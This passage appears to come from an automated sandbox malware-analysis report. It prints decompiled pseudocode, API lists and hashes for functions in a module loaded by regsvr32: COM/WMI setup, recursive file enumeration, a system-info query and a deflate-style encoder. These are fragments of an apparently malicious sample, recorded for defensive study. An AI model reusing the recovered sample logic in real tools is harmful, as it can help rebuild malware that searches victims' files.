                                                                                                                                                                        0x049ee490
                                                                                                                                                                        0x049ee490
                                                                                                                                                                        0x049ee485
                                                                                                                                                                        0x049ee479
                                                                                                                                                                        0x049ee462
                                                                                                                                                                        0x049ee4b3

                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE413
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE424
                                                                                                                                                                        • CoCreateInstance.OLE32(049FC868,00000000,00000001,049FC878,?,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE43B
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 049EE446
                                                                                                                                                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,049EE731,000009DA,00000000,?,00000000), ref: 049EE471
                                                                                                                                                                          • Part of subcall function 049E8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1610782348-0
                                                                                                                                                                        • Opcode ID: 07ff7b741f514cddd00a728b27c5d49f4629b899d9104d7317ea7a01e3d4f295
                                                                                                                                                                        • Instruction ID: a6bc1cb3f9d35e6e1f2877fa7f7924cec2e5fb7459f36731b0d70a2f89ac437a
                                                                                                                                                                        • Opcode Fuzzy Hash: 07ff7b741f514cddd00a728b27c5d49f4629b899d9104d7317ea7a01e3d4f295
                                                                                                                                                                        • Instruction Fuzzy Hash: 0821FC70700249BFEB259B67DC4DE6BBF7CEFC6B15F10416DB505A6290E675AA00CA30
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EBCFC Relevance: 3.1, APIs: 2, Instructions: 105fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                        			E049EBCFC(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E049E9A5A(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E049E8BF4( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E049EBCD4( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push(0x49fc9a0);
						_t60 = E049E9A5A(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x49ff818; // 0x4bef8b0
							 *((intOrPtr*)(_t54 + 0xc0))(1);
							_push(1);
							_push(1);
							_push(0);
							E049EBCFC(_t60, _t75, 1, 5, E049F0015, _a16);
							_t63 = _t63 + 0x1c;
							E049E8BF4( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_t7 = _t61 + 0x49ff924; // 0x0
						_push( *_t7);
						_push( &(_v608.cFileName));
						_t41 =  *0x49ff824; // 0x4befb78
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E049F0015(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x49ff818; // 0x4bef8b0
						 *((intOrPtr*)(_t46 + 0xc0))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x49ff818; // 0x4bef8b0
				 *((intOrPtr*)(_t31 + 0x80))(_t59);
				goto L14;
			}



















                                                                                                                                                                        0x049ebcfc
                                                                                                                                                                        0x049ebd08
                                                                                                                                                                        0x049ebd0a
                                                                                                                                                                        0x049ebd0c
                                                                                                                                                                        0x049ebd12
                                                                                                                                                                        0x049ebd17
                                                                                                                                                                        0x049ebd1a
                                                                                                                                                                        0x049ebd1f
                                                                                                                                                                        0x049ebe3b
                                                                                                                                                                        0x049ebe3b
                                                                                                                                                                        0x049ebd33
                                                                                                                                                                        0x049ebd38
                                                                                                                                                                        0x049ebe2a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ebd3e
                                                                                                                                                                        0x049ebd3e
                                                                                                                                                                        0x049ebd4b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ebd59
                                                                                                                                                                        0x049ebdac
                                                                                                                                                                        0x049ebdac
                                                                                                                                                                        0x049ebdb4
                                                                                                                                                                        0x049ebdb5
                                                                                                                                                                        0x049ebdc0
                                                                                                                                                                        0x049ebdc2
                                                                                                                                                                        0x049ebdc5
                                                                                                                                                                        0x049ebdca
                                                                                                                                                                        0x049ebdcc
                                                                                                                                                                        0x049ebdd4
                                                                                                                                                                        0x049ebdda
                                                                                                                                                                        0x049ebddc
                                                                                                                                                                        0x049ebdde
                                                                                                                                                                        0x049ebdf3
                                                                                                                                                                        0x049ebdf8
                                                                                                                                                                        0x049ebe01
                                                                                                                                                                        0x049ebe07
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ebdca
                                                                                                                                                                        0x049ebd5b
                                                                                                                                                                        0x049ebd5d
                                                                                                                                                                        0x049ebd5d
                                                                                                                                                                        0x049ebd5d
                                                                                                                                                                        0x049ebd69
                                                                                                                                                                        0x049ebd6a
                                                                                                                                                                        0x049ebd74
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ebd81
                                                                                                                                                                        0x049ebd86
                                                                                                                                                                        0x049ebd8b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ebd8d
                                                                                                                                                                        0x049ebd94
                                                                                                                                                                        0x049ebd9a
                                                                                                                                                                        0x049ebd9a
                                                                                                                                                                        0x049ebd9d
                                                                                                                                                                        0x049ebdaa
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ebe08
                                                                                                                                                                        0x049ebe16
                                                                                                                                                                        0x049ebe1e
                                                                                                                                                                        0x049ebe24
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 049EBD2D
                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 049EBE10
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$FirstNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1690352074-0
                                                                                                                                                                        • Opcode ID: c93e7063b7e6544bba701011740c773330816712a74fddc74db945ef4c56a8cc
                                                                                                                                                                        • Instruction ID: c9d7f507f328a26820ff8ff68df1b93144af08e358fc57fb289820b843c076cd
                                                                                                                                                                        • Opcode Fuzzy Hash: c93e7063b7e6544bba701011740c773330816712a74fddc74db945ef4c56a8cc
                                                                                                                                                                        • Instruction Fuzzy Hash: E031B672B00215AFEB21DB66DC89FBA37ACEB44714F040175FA15AB1C1EA71F941CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EA065 Relevance: 1.5, APIs: 1, Instructions: 24timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,049E52C8), ref: 049EA072
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$FileSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2086374402-0
                                                                                                                                                                        • Opcode ID: a82e6b4e221220073db00d7f8785622af2856180965521efabeec798e9c3c94f
                                                                                                                                                                        • Instruction ID: 2a3d5ed8fc7d2519a554d55a887a32ccf8a94ad76ff20742823488e3daa98eaa
                                                                                                                                                                        • Opcode Fuzzy Hash: a82e6b4e221220073db00d7f8785622af2856180965521efabeec798e9c3c94f
                                                                                                                                                                        • Instruction Fuzzy Hash: E3E01AB69003186FDB10AE689D05BAABAACEB80A14F154964AC45A7244E670AE448690
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EDD62 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049EDD62(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}





                                                                                                                                                                        0x049edd6a
                                                                                                                                                                        0x049edd75
                                                                                                                                                                        0x049edd80
                                                                                                                                                                        0x049edd6c
                                                                                                                                                                        0x049edd6e
                                                                                                                                                                        0x049edd70
                                                                                                                                                                        0x049edd70

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,049EE13B), ref: 049EDD75
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                        • Opcode ID: 1ac2737cab4e3fb0c02fd0b430a7016bd4416f0ffd24381d1bfd68a9deb6d94b
                                                                                                                                                                        • Instruction ID: 68164a13683f1999078bcd2cc439cade3b82fdf39dae5b56c16574ce882dd770
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ac2737cab4e3fb0c02fd0b430a7016bd4416f0ffd24381d1bfd68a9deb6d94b
                                                                                                                                                                        • Instruction Fuzzy Hash: 32C022A160020A06CF0097A261167AA32FC5B04208F1001A0EC02F00C0E550EC808260
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049F8240 Relevance: .4, Instructions: 359COMMONCrypto
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E049F8240(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0xfed1e900
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x1cfde808
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x1cfd
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0x105bb
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x105
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0xfed1e900
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x105
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x75ff0c75
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0xe80875ff
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0x105bb
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x105
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0xfed1e900
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0xfed1e903
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0x105bb
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x105
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x59000000
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x35e8
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0xfed1e900
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0x105bb
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x105
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0xfed1e900
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0xff177400
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0xfed1e900
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0xc75ff17
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0x105bb
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x105
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0xfed1e900
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0xfed1e902
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x105
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0xfed1e900
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x59000000
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0x105bb
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x105
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0xfed1e900
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}
























































                                                                                                                                                                        0x049f8243
                                                                                                                                                                        0x049f824a
                                                                                                                                                                        0x049f824e
                                                                                                                                                                        0x049f8250
                                                                                                                                                                        0x049f8252
                                                                                                                                                                        0x049f8258
                                                                                                                                                                        0x049f8745
                                                                                                                                                                        0x049f874b
                                                                                                                                                                        0x049f825e
                                                                                                                                                                        0x049f826a
                                                                                                                                                                        0x049f8277
                                                                                                                                                                        0x049f827a
                                                                                                                                                                        0x049f8281
                                                                                                                                                                        0x049f8284
                                                                                                                                                                        0x049f8287
                                                                                                                                                                        0x049f828a
                                                                                                                                                                        0x049f828b
                                                                                                                                                                        0x049f828e
                                                                                                                                                                        0x049f8294
                                                                                                                                                                        0x049f8297
                                                                                                                                                                        0x049f829c
                                                                                                                                                                        0x049f82ac
                                                                                                                                                                        0x049f82ae
                                                                                                                                                                        0x049f8364
                                                                                                                                                                        0x049f84f3
                                                                                                                                                                        0x049f84f3
                                                                                                                                                                        0x049f84fc
                                                                                                                                                                        0x049f860f
                                                                                                                                                                        0x049f860f
                                                                                                                                                                        0x049f8616
                                                                                                                                                                        0x049f8616
                                                                                                                                                                        0x049f861f
                                                                                                                                                                        0x049f862c
                                                                                                                                                                        0x049f8635
                                                                                                                                                                        0x049f8638
                                                                                                                                                                        0x049f863d
                                                                                                                                                                        0x049f8685
                                                                                                                                                                        0x049f863f
                                                                                                                                                                        0x049f863f
                                                                                                                                                                        0x049f8642
                                                                                                                                                                        0x049f8649
                                                                                                                                                                        0x049f864f
                                                                                                                                                                        0x049f8652
                                                                                                                                                                        0x049f8655
                                                                                                                                                                        0x049f8658
                                                                                                                                                                        0x049f865b
                                                                                                                                                                        0x049f865e
                                                                                                                                                                        0x049f8664
                                                                                                                                                                        0x049f8672
                                                                                                                                                                        0x049f8675
                                                                                                                                                                        0x049f8678
                                                                                                                                                                        0x049f8681
                                                                                                                                                                        0x049f8681
                                                                                                                                                                        0x049f8688
                                                                                                                                                                        0x049f868b
                                                                                                                                                                        0x049f8691
                                                                                                                                                                        0x049f8698
                                                                                                                                                                        0x049f869e
                                                                                                                                                                        0x049f86ec
                                                                                                                                                                        0x049f86f8
                                                                                                                                                                        0x049f86ff
                                                                                                                                                                        0x049f86a0
                                                                                                                                                                        0x049f86a0
                                                                                                                                                                        0x049f86a3
                                                                                                                                                                        0x049f86ac
                                                                                                                                                                        0x049f86af
                                                                                                                                                                        0x049f86b2
                                                                                                                                                                        0x049f86b9
                                                                                                                                                                        0x049f86bc
                                                                                                                                                                        0x049f86bf
                                                                                                                                                                        0x049f86c2
                                                                                                                                                                        0x049f86c5
                                                                                                                                                                        0x049f86cb
                                                                                                                                                                        0x049f86d6
                                                                                                                                                                        0x049f86dc
                                                                                                                                                                        0x049f86e3
                                                                                                                                                                        0x049f86e3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049f869e
                                                                                                                                                                        0x049f8502
                                                                                                                                                                        0x049f8502
                                                                                                                                                                        0x049f8509
                                                                                                                                                                        0x049f8509
                                                                                                                                                                        0x049f8512
                                                                                                                                                                        0x049f851f
                                                                                                                                                                        0x049f8528
                                                                                                                                                                        0x049f852b
                                                                                                                                                                        0x049f8530
                                                                                                                                                                        0x049f8532
                                                                                                                                                                        0x049f8535
                                                                                                                                                                        0x049f853c
                                                                                                                                                                        0x049f8542
                                                                                                                                                                        0x049f8545
                                                                                                                                                                        0x049f8548
                                                                                                                                                                        0x049f854b
                                                                                                                                                                        0x049f854e
                                                                                                                                                                        0x049f8551
                                                                                                                                                                        0x049f8557
                                                                                                                                                                        0x049f8565
                                                                                                                                                                        0x049f856b
                                                                                                                                                                        0x049f856e
                                                                                                                                                                        0x049f8571
                                                                                                                                                                        0x049f8571
                                                                                                                                                                        0x049f8574
                                                                                                                                                                        0x049f8576
                                                                                                                                                                        0x049f8579
                                                                                                                                                                        0x049f857f
                                                                                                                                                                        0x049f8586
                                                                                                                                                                        0x049f858c
                                                                                                                                                                        0x049f85e5
                                                                                                                                                                        0x049f85e5
                                                                                                                                                                        0x049f85e8
                                                                                                                                                                        0x049f85e8
                                                                                                                                                                        0x049f85ee
                                                                                                                                                                        0x049f85f6
                                                                                                                                                                        0x049f8603
